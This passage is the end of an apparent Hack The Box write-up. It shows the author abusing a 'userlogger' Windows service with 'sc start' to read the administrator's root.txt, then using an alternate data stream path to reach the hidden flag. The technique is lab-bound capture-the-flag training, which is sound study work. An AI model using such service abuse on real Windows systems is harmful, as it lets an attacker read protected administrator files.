PS C:\> cmd /c "sc start userlogger 'c:\users\administrator\desktop\root.txt:'"
cmd /c "sc start userlogger 'c:\users\administrator\desktop\root.txt:'"

SERVICE_NAME: userlogger
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1368
FLAGS :


It worked and we are able to read root.txt. But what is this ? A troll ?
Just like bighead I suspected that it had an alternate data stream, but without using streams.exe I tried some stuff and one of my guesses worked :

1
cat c:\users\administrator\desktop\root.txt:flag.txt


And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Netmon
Next Hack The Box write-up : Hack The Box - Friendzone